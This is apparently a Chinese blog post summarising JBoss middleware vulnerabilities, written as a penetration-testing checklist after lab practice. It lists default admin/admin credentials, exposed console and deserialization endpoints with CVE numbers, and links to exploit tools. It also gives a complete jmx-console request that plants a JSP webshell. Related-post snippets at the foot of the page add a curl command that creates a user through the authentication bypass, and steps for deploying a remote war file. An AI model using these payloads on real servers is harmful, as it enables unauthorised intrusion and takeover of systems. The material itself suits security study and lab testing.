java中间件命令执行总结,jboss中间件漏洞总结

最新推荐文章于 2022-12-12 22:13:44 发布
最新推荐文章于 2022-12-12 22:13:44 发布
阅读量437 收藏
点赞数
文章标签: java中间件命令执行总结

目录

前言

获取服务器所采用的中间件信息

JBOSS默认配置后台漏洞

弱口令/未授权访问

Jboss蠕虫

JMX控制台安全验证绕过漏洞(CVE-2010-0738)

反序列化漏洞

命令执行

拒绝服务

其他漏洞

总结

前言

昨天搞了Vulhub靶场里的jboss三个反序列化漏洞,今天总结一下jboss漏洞。该总结来源于Vulhub靶场、wooyun90余个漏洞和exploit-db。

获取服务器所采用的中间件信息

HTTP 中的 X-Powered-By

JBOSS默认配置后台漏洞

漏洞发生在jboss.deployment命名空间中的addURL()函数,该函数可以远程下载一个war压缩包并解压。

/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL

弱口令/未授权访问

admin/admin

/admin-console/login.seam

/admin-console/

/jmx-console/

/web-console/

/jmx-console/HtmlAdaptor?action=displayMBeans

/web-console/ServerInfo.jsp

Jboss蠕虫

/zecmd/zecmd.jsp

JMX控制台安全验证绕过漏洞(CVE-2010-0738)

通过HEAD方法绕过验证部署webshell

660b223466ff268af372d288b9dfc661.png660b223466ff268af372d288b9dfc661.png

https://github.com/ChristianPapathanasiou/jboss-autopwn

反序列化漏洞

/invoker/JMXInvokerServlet

/invoker/EJBInvokerServlet

/invoker/readonly //CVE-2017-12149

/jbossmq-httpil/HTTPServerILServlet //CVE-2017-7504

命令执行

/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=upload5warn.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True

拒绝服务

CVE-2018-1041

https://www.exploit-db.com/exploits/44099

其他漏洞

访问https://www.exploit-db.com/search?q=JBoss

总结

可以制作一个网站目录字典,发现中间件是Jboss,用字典探测,效率会比较高。

车载充气泵
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JAVA上百实例源码以及开源项目
01-03
使用时候只需在控制台窗口执行jar就可以了。 Java 3DMenu 界面源码 5个目标文件 内容索引:Java源码,窗体界面,3DMenu  Java 3DMenu 界面源码,有人说用到游戏中不错,其实平时我信编写Java应用程序时候也能用到吧,...
深入浅出带你学习JBoss中间件常见漏洞
Web_boom的博客
02-16 841
简单来说可以介绍为一个开源的符合J2EE规范的应用服务器,作为J2EE规范的补充,Jboss中引入了AOP框架,为普通Java类提供了J2EE服务,而无需遵循EJB规范。该中间件的特点如下:它将具有革命性的JMX微内核服务作为其总线结构;它本身就是面向服务的架构(Service-Oriented Architecture,SOA);它还具有统一的类装载器,从而能够实现应用的热部署和热卸载能力。了解完JBOSS中间件的介绍,下面我们来讲关于该中间件漏洞
关于JBOSS环境搭建和中间件漏洞复现
qq_43511592的博客
09-21 1392
服务器: windows 7 攻击机: windows 10 一、环境搭建 使用win7搭建环境,由于jboss依赖Java基本环境,所以应当先安装Java环境,使用jdk-6u14版本,Java安装完成后记得去环境变量配置 jboss安装包在jboss下载页面下载即可,为压缩包,此处使用版本为4.2.2.GA 下载完成后将压缩包内的文件夹解压到C盘根目录并改名为jboss,由于此处我们不使用其它功能——权限处理组件AOP|mysql连接驱动等暂时不安装 在命令行界面cd进入jboss目录...
jboss 认证绕过漏洞利用的另外一种方式添加用户
cnbird's blog
02-05 3708
curl -I "http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser
2019测试指南-web应用程序安全测试(二)地图应用架构
weixin_33831673的博客
03-04 217
2019独角兽企业重金招聘Python工程师标准>>> ...
JBoss中间件漏洞总结
weixin_42345596的博客
08-27 1302
一.Jboss简介 Jboss一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080 二.Jboss安装 下载地址:https://jbossas.jboss.org/downloads/ 1.安装jdk 这里用了两台机子,一台安装老版本J
JBoss默认身份验证漏洞利用及修复
weixin_34289454的博客
04-11 421
JBoss应用服务器是一个开源的基于Java EE应用服务器。 JBoss被广泛使用,许多组织的web服务器都是由JBoss部署的。JBoss已经爆出过很多漏洞和错误,本文将分享JBoss应用程序默认身份验证漏洞的利用和修复. 如果JBoss配置不正确,就会允许***者执行各种恶意活动。由于JMX在通常情况下可以通过8080端口进行远程访问,***和恶意用户可以通过JBos...
JBoss漏洞 - CVE-2007-1036
HAKUNAMATATATTA的博客
12-12 2152
漏洞主要是由于JBoss中 /jmx-console/HtmlAdaptor 路径对外开放,并且没有任何身份验证机制,导致攻击者可以进入到jmx控制台,并在其中执行任何功能。该漏洞利用的是后台中 jboss.admin ->DeploymentFileRepository -> store() 方法,通过向四个参数传入信息,达到上传shell的目的,其中arg0传入的是部署的war包名字,arg1传入的是上传的文件的文件名,arg2传入的是上传文件的文件格式,arg3传入的是上传文件中的内容。
护网面试题总结+DD安全工程师笔试问题
最新发布
09-15
知识点:常见的中间件漏洞包括 IIS PUT 漏洞、短文件名猜解、远程代码执行、解析漏洞 Apache 解析漏洞、目录遍历 Nginx 文件解析、目录遍历、CRLF 注入、目录穿越 Tomcat 远程代码执行、war 后门文件部署 JBoss 反序...
weblogic10.3.6补丁(java反序列化漏洞更新步骤).docx
09-10
近日,Apache Commons Collections 等公共库被发现存在 Java 反序列化漏洞WebLogic、WebSphere、JBoss、Jenkins、OpenNMS 等主流中间件和框架均受到影响,攻击者利用该漏洞可以远程执行操作系统命令,入侵应用系统...
JAVA上百实例源码以及开源项目源代码
12-11
日历表格面板 [ConfigLine.java] 控制条类 [RoundBox.java] 限定选择控件 [MonthMaker.java] 月份表算法类 [Pallet.java] 调色板,统一配色类 Java扫雷源码 Java生成自定义控件源代码 2个目标文件 Java实现HTTP连接...
JBoss中间件漏洞汇总
热门推荐
混子
11-18 1万+
目录 一、JBoss是什么? 二、安装环境 1. Jdk 2. 下载JBoos4、6,并进行配置 三、 反序列漏洞 1. HttpInvoker 组件(CVE-2017-12149) 2. JMXInvokerServlet组件(CVE-2015-7501) 3. JBossMQ(CVE-2017-7504) 4.EJBInvokerServlet组件(CVE-2013-4810) 四、 War后门文件部署 1. admin-cosole(爆红接着传) 2. JMX-console.
jboss中间件漏洞总结
看不尽的尘埃——博客
02-09 6217
目录     前言   获取服务器所采用的中间件信息   JBOSS默认配置后台漏洞   弱口令/未授权访问   Jboss蠕虫   JMX控制台安全验证绕过漏洞(CVE-2010-0738)   反序列化漏洞   命令执行   拒绝服务   其他漏洞   总结   前言 昨天搞了Vulhub靶场里的jboss三个反序列化漏洞,今天总结一下jbo...
Jboss 4.x版本jmx-console控制台弱口令getshell
来到了学渣的博客
08-31 2567
总结: 1.发现jboss4.0,尝试弱口令,成功 2.直接访问ip/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL 3.void addurl中的Param Value中插入公网部署好的war包 4.返回第二步,并点击apply changes 5.查看jmx-console目录下如果有部署war包的名字证明上传成功 6.ip/wa
JBoss jmx-console和web-console的安全设置
Elender的专栏
11-29 972
JBoss jmx-console和web-console的安全设置 介绍 如果在网上公布了自己的JBoss服务器(用选项-b 0.0.0.0启动服务器或者在.../jboss/server/default/deploy/web-deployer/server.xml 改变第一个发生变量jboss.bind.address 为 0.0.0.0), 你也自动的公开了JBoss web-cons
Jboss下jmx-console与web-console配置
weixin_33724046的博客
11-19 193
JBoss安装成功后,一般可以通过http://localhost:port来访问.Jmx Console和Jboss Web Console 里面可以修改和删除应用的参数,如果不加强安全设置,将会带来严重安全后果。 默认登录jmx-console的账号信息是:admin/admin,因此我们应该修改这个账号信息。 一、JMX安全配置 1: 找到%JBOSS...
JBoos漏洞及利用整理
weixin_45106410的博客
11-30 4247
CVE-2013-4810 Apache Tomcat/Jboss远程代码执行漏洞 与CVE-2015-7501漏洞原理相同,这里详细介绍一下两者的区别,其区别就在于两个漏洞选择的进行其中JMXInvokerServlet和EJBInvokerServlet利用的是org.jboss.invocation.MarshalledValue进行的反序列化操作,而web-console/Invoker利用的org.jboss.console.remote.RemoteMBeanInvocation进行反序列化并
常见的Java中间件漏洞
05-20
2. JBoss漏洞JBoss一个流行的开源应用服务器,它也曾经被发现了多个漏洞,包括远程代码执行漏洞和未授权访问漏洞。 3. WebLogic漏洞WebLogic是Oracle公司的一款Java应用服务器,2019年曝出了一个严重漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值